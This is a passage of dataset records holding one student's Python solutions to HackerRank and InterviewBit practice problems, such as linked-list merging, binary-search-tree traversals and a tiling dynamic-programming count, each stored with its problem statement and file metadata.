\r\n\r\n:\r\nbird\r\nType\r\n:\r\nbirds\r\nType\r\n:\r\nbird\r\nType\r\n:\r\nbirds\r\nType\r\n:\r\n\r\n bird\r\n\r\nThe type number that occurs at the highest frequency is type\r\n, so we print\r\n\r\nas our answer.\r\n\r\nSample Input 1\r\n\r\n11\r\n1 2 3 4 5 4 3 2 1 3 4\r\n\r\nSample Output 1\r\n\r\n3\r\n\r\nExplanation 1\r\n\r\nThe different types of birds occur in the following frequencies:\r\n\r\n Type \r\n\r\n: Type : Type : Type : Type : Two types have a frequency of , and the lower of those is type .\r\n\r\n\r\n\"\"\"\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the migratoryBirds function below.\r\ndef migratoryBirds(arr):\r\n c_ar = [0]*5\r\n for i in arr:\r\n c_ar[i-1] += 1\r\n ma = c_ar[0]\r\n f = 0\r\n for i in range (1, 5):\r\n if(ma<c_ar[i]):\r\n ma = c_ar[i]\r\n f = i+1\r\n return f\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n arr_count = int(input().strip())\r\n\r\n arr = list(map(int, input().rstrip().split()))\r\n\r\n result = migratoryBirds(arr)\r\n\r\n fptr.write(str(result) + '\\n')\r\n\r\n fptr.close()\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6163661479949951,
"alphanum_fraction": 0.6360610127449036,
"avg_line_length": 21.562091827392578,
"blob_id": "64d5396ca612196ffdf65d0482c7bdd60b41bab3",
"content_id": "f2d3023e869128131fcb15870f15e31a044a6c0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3607,
"license_type": "no_license",
"max_line_length": 316,
"num_lines": 153,
"path": "/Merge two sorted linked lists.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nMerge two sorted linked lists\r\n1272.43 more points to get your next star!\r\nRank: 111904|Points: 927.57/2200\r\nProblem Solving\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n Editorial\r\n\r\nThis challenge is part of a tutorial track by MyCodeSchool\r\n\r\nYou’re given the pointer to the head nodes of two sorted linked lists. The data in both lists will be sorted in ascending order. Change the next pointers to obtain a single, merged linked list which also has data in ascending order. Either head pointer given may be null meaning that the corresponding list is empty.\r\n\r\nInput Format\r\n\r\nYou have to complete the SinglyLinkedListNode MergeLists(SinglyLinkedListNode headA, SinglyLinkedListNode headB) method which takes two arguments - the heads of the two sorted linked lists to merge. You should NOT read any input from stdin/console.\r\n\r\nThe input is handled by the code in the editor and the format is as follows:\r\n\r\nThe first line contains an integer\r\n\r\n, denoting the number of test cases.\r\nThe format for each test case is as follows:\r\n\r\nThe first line contains an integer\r\n, denoting the length of the first linked list.\r\nThe next lines contain an integer each, denoting the elements of the linked list.\r\nThe next line contains an integer , denoting the length of the second linked list.\r\nThe next\r\n\r\nlines contain an integer each, denoting the elements of the second linked list.\r\n\r\nConstraints\r\n\r\n, where is the\r\n\r\n element of the list.\r\n\r\nOutput Format\r\n\r\nChange the next pointer of individual nodes so that nodes from both lists are merged into a single list. Then return the head of this merged list. Do NOT print anything to stdout/console.\r\n\r\nThe output is handled by the editor and the format is as follows:\r\n\r\nFor each test case, print in a new line, the linked list after merging them separated by spaces.\r\n\r\nSample Input\r\n\r\n1\r\n3\r\n1\r\n2\r\n3\r\n2\r\n3\r\n4\r\n\r\nSample Output\r\n\r\n1 2 3 3 4 \r\n\r\nExplanation\r\n\r\nThe first linked list is: 1 -> 2 -> 3 -> NULL\r\n\r\nThe second linked list is: 3 -> 4 -> NULL\r\n\r\nHence, the merged linked list is: 1 -> 2 -> 3 -> 3 -> 4 -> NULL\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\nclass SinglyLinkedListNode:\r\n def __init__(self, node_data):\r\n self.data = node_data\r\n self.next = None\r\n\r\nclass SinglyLinkedList:\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n\r\n def insert_node(self, node_data):\r\n node = SinglyLinkedListNode(node_data)\r\n\r\n if not self.head:\r\n self.head = node\r\n else:\r\n self.tail.next = node\r\n\r\n\r\n self.tail = node\r\n\r\ndef print_singly_linked_list(node, sep, fptr):\r\n while node:\r\n fptr.write(str(node.data))\r\n\r\n node = node.next\r\n\r\n if node:\r\n fptr.write(sep)\r\n\r\n# Complete the mergeLists function below.\r\n\r\n#\r\n# For your reference:\r\n#\r\n# SinglyLinkedListNode:\r\n# int data\r\n# SinglyLinkedListNode next\r\n#\r\n#\r\ndef mergeLists(h1, h2):\r\n h3 = SinglyLinkedListNode(-1)\r\n t = h3\r\n while(h1 != None and h2 != None):\r\n if(h1.data < h2.data):\r\n x = SinglyLinkedListNode(h1.data)\r\n x = h1\r\n h1= h1.next\r\n x.next = None\r\n h3.next = x\r\n h3 = x\r\n else:\r\n x = SinglyLinkedListNode(h2.data)\r\n x = h2\r\n h2= h2.next\r\n x.next = None\r\n h3.next = x\r\n h3 = x\r\n if(h1 != None):\r\n h3.next = h1\r\n else:\r\n h3.next = h2\r\n return t.next\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n"
},
{
"alpha_fraction": 0.4561053514480591,
"alphanum_fraction": 0.48164406418800354,
"avg_line_length": 18.04800033569336,
"blob_id": "89eef01943ddae8344f048012c7fd88b4a350f81",
"content_id": "5881613cea80071bad0418a0f742194c109d5d39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2506,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 125,
"path": "/Level Order of Tree.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nLevel Order of Tree\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nGiven an array of unique elements, construct a\r\nBinary Search Tree and print the Level Order of the tree.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases.\r\nIts followed by 2T lines. First line of each test case contains\r\nN - number of nodes in the BST. The next line contains N unique\r\nintegers - value of the nodes.\r\n\r\nConstraints\r\n\r\nFor each test case, print the Level Order of the Binary Search Tree,\r\nseparate each level by newline. Separate the output of different test\r\ncases with an extra newline.\r\n\r\nOutput Format\r\n\r\n1 <= T <= 1000\r\n1 <= N <= 1000\r\n0 <= ar[i] <= 10000\r\n\r\nSample Input 0\r\n\r\n3\r\n5\r\n1 2 3 4 5 \r\n5\r\n3 2 4 1 5 \r\n7\r\n4 5 15 0 1 7 17 \r\n\r\nSample Output 0\r\n\r\n1 \r\n2 \r\n3 \r\n4 \r\n5 \r\n\r\n3 \r\n2 4 \r\n1 5 \r\n\r\n4 \r\n0 5 \r\n1 15 \r\n7 17 \r\n\r\n\r\n\r\n\r\n\"\"\"\r\n\r\nclass Node:\r\n def __init__(self, info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n self.level = None \r\n\r\n def _str_(self):\r\n return str(self.info) \r\n\r\nclass BinarySearchTree:\r\n def __init__(self): \r\n self.root = None\r\n\r\n def create(self, val): \r\n if (self.root == None):\r\n self.root = Node(val)\r\n else:\r\n current = self.root\r\n \r\n while True:\r\n if val < current.info:\r\n if current.left:\r\n current = current.left\r\n else:\r\n current.left = Node(val)\r\n break\r\n elif val > current.info:\r\n if current.right:\r\n current = current.right\r\n else:\r\n current.right = Node(val)\r\n break\r\n else:\r\n break\r\ndef levelor(root):\r\n if root is None: \r\n return\r\n q = [] \r\n q.append(root) \r\n \r\n while q: \r\n count = len(q) \r\n while count > 0: \r\n temp = q.pop(0) \r\n print(temp.info, end = ' ') \r\n if temp.left: \r\n q.append(temp.left) \r\n if temp.right: \r\n q.append(temp.right) \r\n \r\n count -= 1\r\n print(' ') \r\n\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n tree = BinarySearchTree()\r\n ar = list(map(int, input().split()))\r\n for i in ar:\r\n tree.create(i)\r\n levelor(tree.root)\r\n print()\r\n"
},
{
"alpha_fraction": 0.34730538725852966,
"alphanum_fraction": 0.41916167736053467,
"avg_line_length": 14.699999809265137,
"blob_id": "620916164678b591d292346c9789409bbdc0ac76",
"content_id": "34366c52107d760754e73a7ca71a11f7936db0d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 10,
"path": "/ATM.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "l = input().split()\r\n\r\nA = int(l[0])\r\n\r\nB = float(l[1])\r\n\r\nif((A<B)and(A%5==0)and (A<=2000)):\r\n print(\"%.2f\"%(B-A-0.5))\r\nif((B>A)or(A==B)):\r\n print(\"%.2f\"%(B))\r\n"
},
{
"alpha_fraction": 0.598739504814148,
"alphanum_fraction": 0.6764705777168274,
"avg_line_length": 20.3125,
"blob_id": "799c69fae9e705e9bb90f46cd2b5e33cc32e520c",
"content_id": "dc71b31dc37a7e613ed8150aef78947a0bd1aa8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1428,
"license_type": "no_license",
"max_line_length": 227,
"num_lines": 64,
"path": "/Arranging Dominos DP.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nArranging Dominos\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nYou are given a floor of size 5xN. You have tiles of 2 different sizes: 1x5 and 2x5. Of course, you can rotate the tiles to get 2 more tile sizes: 5x1 and 5x2. You have to do the flooring using these tiles in the following way:\r\n1. Floor space should be completely covered by tiles.\r\n2. You cannot break tiles, ie, you have to use a tile entirely or not at all.\r\n3. Any tile should not extend beyond the floor space.\r\n4. Tiles should be placed parallel to the floor boundaries.\r\n\r\nYour task is to find the number of ways in which you can lay the tiles on the floor.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases. Its followed by T lines, each line contains N - the length of the floor. The width of the floor is fixed to be 5.\r\n\r\nConstraints\r\n\r\n1 <= T <= 10000\r\n1 <= N <= 106\r\n\r\nOutput Format\r\n\r\nFor each test case, print the number of ways in which you can lay the tiles on the floor, separated by new line. Since the output can be very large, print result % 1000000007 [1e9+7].\r\n\r\nSample Input 0\r\n\r\n5\r\n2\r\n4\r\n20\r\n120\r\n10\r\n\r\nSample Output 0\r\n\r\n2\r\n5\r\n466098\r\n562804719\r\n457\r\n\r\n\r\n\r\n\"\"\"\r\n\r\ndp=[0]*1000001\r\ndp[0]=1\r\ndp[1]=1\r\ndp[2]=2\r\ndp[3]=3\r\ndp[4]=5\r\n\r\nm=1000000007 \r\nfor i in range(5,1000001):\r\n dp[i]=(dp[i-1]+dp[i-2]+(8*dp[i-5]))%m\r\nfor _ in range(int(input())):\r\n n=int(input())\r\n print(dp[n]%m)\r\n"
},
{
"alpha_fraction": 0.6279823184013367,
"alphanum_fraction": 0.6374079585075378,
"avg_line_length": 29.728971481323242,
"blob_id": "4a320a9cbd930cd074bd36b40ce6a918847b8f54",
"content_id": "7f6a879b446521975dc76eddfc8a978cf90436ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3395,
"license_type": "no_license",
"max_line_length": 319,
"num_lines": 107,
"path": "/Two Characters.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTwo Characters\r\n\r\n120.76 more points to get your gold badge!\r\nRank: 154912|Points: 729.24/850\r\nProblem Solving\r\nProblem\r\nSubmissions\r\nLeaderboard\r\nDiscussions\r\nEditorial\r\nIn this challenge, you will be given a string. You must remove characters until the string is made up of any two alternating characters. When you choose a character to remove, all instances of that character must be removed. Your goal is to create the longest string possible that contains just two alternating letters.\r\n\r\nAs an example, consider the string abaacdabd. If you delete the character a, you will be left with the string bcdbd. Now, removing the character c leaves you with a valid string bdbd having a length of 4. Removing either b or d at any point would not result in a valid string.\r\n\r\nGiven a string , convert it to the longest possible string made up only of alternating characters. Print the length of string on a new line. If no string can be formed, print instead.\r\n\r\nFunction Description\r\n\r\nComplete the alternate function in the editor below. It should return an integer that denotes the longest string that can be formed, or if it cannot be done.\r\n\r\nalternate has the following parameter(s):\r\n\r\ns: a string\r\nInput Format\r\n\r\nThe first line contains a single integer denoting the length of .\r\nThe second line contains string .\r\n\r\nConstraints\r\n\r\nOutput Format\r\n\r\nPrint a single integer denoting the maximum length of for the given ; if it is not possible to form string , print instead.\r\n\r\nSample Input\r\n\r\n10\r\nbeabeefeab\r\nSample Output\r\n\r\n5\r\nExplanation\r\n\r\nThe characters present in are a, b, e, and f. This means that must consist of two of those characters and we must delete two others. Our choices for characters to leave are [a,b], [a,e], [a, f], [b, e], [b, f] and [e, f].\r\n\r\nIf we delete e and f, the resulting string is babab. This is a valid as there are only two distinct characters (a and b), and they are alternating within the string.\r\n\r\nIf we delete a and f, the resulting string is bebeeeb. This is not a valid string because there are consecutive e's present. Removing them would leave consecutive b's, so this fails to produce a valid string .\r\n\r\nOther cases are solved similarly.\r\n\r\nbabab is the longest string we can create.\r\n\r\n\"\"\"\r\n\r\n\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the alternate function below.\r\ndef alternate(s):\r\n maxl = count = 0\r\n alp = list(set(s))\r\n # make combinations\r\n for i in range (len(alp)):\r\n for j in range(i+1, len(alp)):\r\n l = [alp[i], alp[j]]\r\n if(s.index(alp[i])<s.index(alp[j])):\r\n ind = 0\r\n else:\r\n ind = 1\r\n for ch in s:\r\n if ch in l:\r\n if(ch == l[ind]):\r\n count += 1\r\n ind = ind ^ 1\r\n else:\r\n # this cond is for to break if nxt char is also a same\r\n # as previous char\r\n count = 0\r\n break \r\n maxl = max(maxl, count )\r\n count = 0\r\n return maxl\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n l = int(input().strip())\r\n\r\n s = input()\r\n\r\n result = alternate(s)\r\n\r\n fptr.write(str(result) + '\\n')\r\n\r\n fptr.close()\r\n"
},
{
"alpha_fraction": 0.62994784116745,
"alphanum_fraction": 0.6489720940589905,
"avg_line_length": 20.170068740844727,
"blob_id": "dc0357f892bc5058e0f6fc2eba9065807d0a2473",
"content_id": "2c53555bcb95a208a08280fc3cd43f4b881368e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3261,
"license_type": "no_license",
"max_line_length": 335,
"num_lines": 147,
"path": "/Compare two linked lists.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nCompare two linked lists\r\n1277.43 more points to get your next star!\r\nRank: 112809|Points: 922.57/2200\r\nProblem Solving\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n Editorial\r\n\r\nThis challenge is part of a tutorial track by MyCodeSchool\r\n\r\nYou’re given the pointer to the head nodes of two linked lists. Compare the data in the nodes of the linked lists to check if they are equal. The lists are equal only if they have the same number of nodes and corresponding nodes contain the same data. Either head pointer given may be null meaning that the corresponding list is empty.\r\n\r\nInput Format\r\n\r\nYou have to complete the int CompareLists(Node* headA, Node* headB) method which takes two arguments - the heads of the two linked lists to compare. You should NOT read any input from stdin/console.\r\n\r\nThe input is handled by the code in the editor and the format is as follows: The first line contains\r\n\r\n, the number of test cases. The format for each test case is as follows:\r\n\r\nThe first line contains an integer\r\n, denoting the number of elements in the first linked list.\r\nThe next lines contain an integer each, denoting the elements of the first linked list.\r\nThe next line contains an integer , denoting the number of elements in the second linked list.\r\nThe next\r\n\r\nlines contain an integer each, denoting the elements of the second linked list.\r\n\r\nConstraints\r\n\r\n, where is the\r\n\r\n element in the list.\r\n\r\nOutput Format\r\n\r\nCompare the two linked lists and return 1 if the lists are equal. Otherwise, return 0. Do NOT print anything to stdout/console.\r\n\r\nThe output is handled by the code in the editor and it is as follows:\r\n\r\nFor each test case, in a new line, print\r\nif the two lists are equal, else print\r\n\r\n.\r\n\r\nSample Input\r\n\r\n2\r\n2\r\n1\r\n2\r\n1\r\n1\r\n2\r\n1\r\n2\r\n2\r\n1\r\n2\r\n\r\nSample Output\r\n\r\n0\r\n1\r\n\r\nExplanation\r\n\r\nIn the first case, linked lists are: 1 -> 2 -> NULL and 1 -> NULL\r\n\r\nIn the second case, linked lists are: 1 -> 2 -> NULL and 1 -> 2 -> NULL\r\n\r\n\"\"\"\r\n\r\n#!/bin/python3\r\n\r\nimport os\r\nimport sys\r\n\r\nclass SinglyLinkedListNode:\r\n def __init__(self, node_data):\r\n self.data = node_data\r\n self.next = None\r\n\r\nclass SinglyLinkedList:\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n\r\n def insert_node(self, node_data):\r\n node = SinglyLinkedListNode(node_data)\r\n\r\n if not self.head:\r\n self.head = node\r\n else:\r\n self.tail.next = node\r\n\r\n\r\n self.tail = node\r\n\r\ndef print_singly_linked_list(node, sep, fptr):\r\n while node:\r\n fptr.write(str(node.data))\r\n\r\n node = node.next\r\n\r\n if node:\r\n fptr.write(sep)\r\n\r\n# Complete the compare_lists function below.\r\n\r\n#\r\n# For your reference:\r\n#\r\n# SinglyLinkedListNode:\r\n# int data\r\n# SinglyLinkedListNode next\r\n#\r\n#\r\ndef compare_lists(llist1, llist2):\r\n while(llist1 != None and llist2 != None):\r\n if(llist1.data == llist2.data):\r\n \r\n llist1 = llist1.next\r\n llist2 = llist2.next\r\n else:\r\n return 0\r\n if(llist1 == None and llist2 == None):\r\n return 1 \r\n if(llist1 == None or llist2 == None):\r\n return 0\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n"
},
{
"alpha_fraction": 0.4275362193584442,
"alphanum_fraction": 0.4521739184856415,
"avg_line_length": 17.58823585510254,
"blob_id": "1698346dd9c70a3e5cb4235a33ea60771187aea7",
"content_id": "17ecc4a8dbdb947dac81fb082a69e0e5fbbd6183",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 690,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 34,
"path": "/Implement power fun.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nImplement pow(x, n) % d.\r\n\r\nIn other words, given x, n and d,\r\n\r\nfind (xn % d)\r\n\r\nNote that remainders on division cannot be negative.\r\nIn other words, make sure the answer you return is non negative.\r\n\r\nInput : x = 2, n = 3, d = 3\r\nOutput : 2\r\n\r\n2^3 % 3 = 8 % 3 = 2.\r\n\r\n\r\n\"\"\"\r\n\r\nclass Solution:\r\n # @param x : integer\r\n # @param n : integer\r\n # @param d : integer\r\n # @return an integer\r\n \r\n def pow(self, x, n, d):\r\n if(x==0):\r\n return 0\r\n if(n==0):\r\n return 1\r\n ans = pow(x, n//2, d)\r\n if(n&1==0):\r\n return (ans * ans)%d\r\n else:\r\n return (ans * ans * x)%d\r\n \r\n \r\n"
},
{
"alpha_fraction": 0.5060137510299683,
"alphanum_fraction": 0.519759476184845,
"avg_line_length": 19.33333396911621,
"blob_id": "f6099d30f57a33f29504ae2dd2a53cbee62e54f3",
"content_id": "eca07ae8aadc0c21d4efdf1da7e197339f9f22cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1164,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 54,
"path": "/Remove Nth Node from List End.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nRemove Nth Node from List End\r\n\r\n Asked in: \r\n HCL\r\n Amazon\r\n\r\nGiven a linked list, remove the nth node from the end of list and return its head.\r\n\r\nFor example,\r\nGiven linked list: 1->2->3->4->5, and n = 2.\r\nAfter removing the second node from the end, the linked list becomes 1->2->3->5.\r\n\r\n Note:\r\n\r\n If n is greater than the size of the list, remove the first node of the list.\r\n\r\nTry doing it using constant additional space.\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @param B : integer\r\n # @return the head node in the linked list\r\n def removeNthFromEnd(self, A, B):\r\n x=A\r\n count=0\r\n while(x!=None):\r\n count+=1\r\n x=x.next\r\n if(count==1):\r\n x=None\r\n return x\r\n if(count<=B):\r\n A=A.next\r\n return A\r\n s=count-B+1\r\n x=A\r\n for i in range(0,s-2):\r\n x=x.next\r\n x.next=x.next.next\r\n return A\r\n \r\n\r\n"
},
{
"alpha_fraction": 0.46463415026664734,
"alphanum_fraction": 0.48821139335632324,
"avg_line_length": 20.77777862548828,
"blob_id": "dd6735068596b7cefa1c9477d5aca89e7752552f",
"content_id": "046450ff089c005807cb53add4a0ba547f847399",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2460,
"license_type": "no_license",
"max_line_length": 213,
"num_lines": 108,
"path": "/Left View of Tree.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nLeft View of Tree\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nGiven an array of unique elements, construct a Binary Search Tree and print the left-view of the tree. Left view of a Tree is the set of nodes visible when tree is viewed from left side.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases. Its followed by 2T lines. First line of each test case contains N - number of nodes in the BST. The next line contains N unique integers - value of the nodes.\r\n\r\nConstraints\r\n\r\n1 <= T <= 1000\r\n1 <= N <= 1000\r\n0 <= ar[i] <= 10000\r\n\r\nOutput Format\r\n\r\nFor each test case, print the left-view of the Binary Search Tree, separated by newline.\r\n\r\nSample Input 0\r\n\r\n3\r\n5\r\n1 2 3 4 5\r\n5\r\n3 2 4 1 5\r\n7\r\n4 5 15 0 1 7 17\r\n\r\nSample Output 0\r\n\r\n1 2 3 4 5 \r\n3 2 1 \r\n4 0 1 7 \r\n\r\n\r\n\r\n\r\n\"\"\"\r\n\r\nclass Node:\r\n def _init_(self, info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n self.level = None \r\n\r\n def _str_(self):\r\n return str(self.info) \r\n\r\nclass BinarySearchTree:\r\n def _init_(self): \r\n self.root = None\r\n\r\n def create(self, val): \r\n if (self.root == None):\r\n self.root = Node(val)\r\n else:\r\n current = self.root\r\n \r\n while True:\r\n if val < current.info:\r\n if current.left:\r\n current = current.left\r\n else:\r\n current.left = Node(val)\r\n break\r\n elif val > current.info:\r\n if current.right:\r\n current = current.right\r\n else:\r\n current.right = Node(val)\r\n break\r\n else:\r\n break\r\ndef levelor(root):\r\n if root is None: \r\n return\r\n q = [] \r\n q.append(root)\r\n \r\n while(len(q)>0):\r\n k=len(q)\r\n temp=[]\r\n for i in range(0,k):\r\n x = q.pop(0)\r\n temp.append(x)\r\n if(x.left != None):\r\n q.append(x.left)\r\n if(x.right != None):\r\n q.append(x.right)\r\n print(temp[0].info,end=\" \")\r\n # print()\r\n\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n tree = BinarySearchTree()\r\n ar = list(map(int, input().split()))\r\n for i in ar:\r\n tree.create(i)\r\n levelor(tree.root)\r\n print()\r\n"
},
{
"alpha_fraction": 0.4952380955219269,
"alphanum_fraction": 0.5309523940086365,
"avg_line_length": 9.50684928894043,
"blob_id": "9bf91217f6e2d5b0e801356f440222d788862f20",
"content_id": "440ce4d25fce75779b6670b7599bb21ec3d20876",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 840,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 73,
"path": "/Excel Column Number.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nExcel Column Number\r\nAsked in: \r\nAmazon\r\nProblem Description\r\n\r\nGiven a column title A as appears in an Excel sheet, return its corresponding column number.\r\n\r\n\r\n\r\nProblem Constraints\r\n1 <= |A| <= 100\r\n\r\n\r\n\r\nInput Format\r\nFirst and only argument is string A.\r\n\r\n\r\n\r\nOutput Format\r\nReturn an integer\r\n\r\n\r\n\r\nExample Input\r\nInput 1:\r\n\r\n 1\r\nInput 2:\r\n\r\n 28\r\n\r\n\r\nExample Output\r\nOutput 1:\r\n\r\n \"A\"\r\nOutput 2:\r\n\r\n \"AB\"\r\n\r\n\r\nExample Explanation\r\nExplanation 1:\r\n\r\n 1 -> \"A\"\r\nExplanation 2:\r\n\r\nA -> 1\r\nB -> 2\r\nC -> 3\r\n...\r\nZ -> 26\r\nAA -> 27\r\nAB -> 28 \r\n\r\n\r\n\"\"\"\r\n\r\n\r\n\r\nclass Solution:\r\n # @param A : string\r\n # @return an integer\r\n def titleToNumber(self, A):\r\n \r\n B = A[::-1]\r\n total = 0\r\n for i in range( 0, len( B ) ):\r\n total += ( ord( B[i] ) - 64 ) * pow( 26, i ) \r\n return total\r\n"
},
{
"alpha_fraction": 0.3842729926109314,
"alphanum_fraction": 0.4154302775859833,
"avg_line_length": 22.288288116455078,
"blob_id": "0ee8679c757c4cb0f59c0832138174556d7e7300",
"content_id": "73d349c0c03ad7404fa6649981f978c5d8997b5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2696,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 111,
"path": "/ADD No LinkedLists.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n\"\"\" EDitorial fastest \"\"\"\"\r\n Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @param B : head node of linked list\r\n # @return the head node in the linked list\r\n def addTwoNumbers(self, A, B):\r\n # corner cases\r\n if A == None and B == None:\r\n return None\r\n \r\n p1, p2 = A, B\r\n \r\n # add B to A\r\n carry = 0\r\n while p1.next != None and p2.next != None:\r\n added_num = p1.val + p2.val + carry\r\n p1.val = added_num%10\r\n carry = added_num//10\r\n p1 = p1.next\r\n p2 = p2.next\r\n\r\n added_num = p1.val + p2.val + carry\r\n p1.val = added_num%10\r\n carry = added_num//10\r\n\r\n if p1.next == None and p2.next == None:\r\n if carry == 1:\r\n p1.next = ListNode(1)\r\n else:\r\n if p1.next == None:\r\n p1.next = p2.next\r\n p1 = p1.next\r\n while carry and p1.next != None:\r\n added_num = p1.val + carry\r\n p1.val = added_num%10\r\n carry = added_num//10\r\n p1 = p1.next\r\n if carry == 1:\r\n added_num = p1.val + carry\r\n p1.val = added_num%10\r\n carry = added_num//10\r\n if carry == 1:\r\n p1.next = ListNode(1)\r\n return A\r\n\r\n\r\n\r\n\r\n \"\"\" SELF HACKER RANK SMART INTERVIEWS \"\"\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n # Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @param B : head node of linked list\r\n # @return the head node in the linked list\r\n def Rev(self, head):\r\n h2 = None\r\n while(head != None):\r\n x = ListNode(head.val)\r\n x = head\r\n head = head.next\r\n x.next = h2\r\n h2 = x\r\n return h2\r\n \r\n \r\n def addTwoNumbers(self, h1, h2):\r\n h3 = None\r\n h1 = self.Rev(h1)\r\n h2 = self.Rev(h2)\r\n c = 0\r\n while(h1 != None or h2 != None or c!=0):\r\n su = c\r\n if(h1 != None):\r\n su += h1.val\r\n h1 = h1.next\r\n if(h2 != None):\r\n su += h2.val\r\n h2 = h2.next\r\n x = ListNode(su%10)\r\n x.next = h3\r\n h3 = x\r\n c = su//10\r\n h3 = self.Rev(h3)\r\n \r\n return h3\r\n"
},
{
"alpha_fraction": 0.6261767148971558,
"alphanum_fraction": 0.6413604617118835,
"avg_line_length": 20.86805534362793,
"blob_id": "c6b9340c993fbc9fec61e761ae2cdb0b48a37b45",
"content_id": "4a919eb29b54d4d06fdfa1b61e5bd92ff740e60d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3295,
"license_type": "no_license",
"max_line_length": 205,
"num_lines": 144,
"path": "/Reverse a linked list.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
